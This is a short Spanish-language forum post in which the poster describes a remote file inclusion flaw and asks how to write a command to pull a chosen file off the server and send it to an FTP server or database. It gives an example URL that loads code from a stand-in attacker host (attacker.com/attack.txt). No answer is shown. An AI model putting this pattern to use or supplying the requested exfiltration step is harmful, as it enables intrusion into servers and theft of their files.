Hola, he descubierto una vulnerabilidad en una pagina sql que permitiria la ejecución de comandos en el servidor por ejemplo:
"www.vulnerablesite.com/index.php?page=http://www.attacker.com/attack.txt"
¿Como deberia ser el comando en xml que deberia de subir para extraer un determinado archivo y subirlo a un ftp o a una base de datos? (Suponiendo que yo me sepa todas las carpetas del servidor, que me las sé)
Gracias de antemano chicos! gracias y nos vemos =P
Marcadores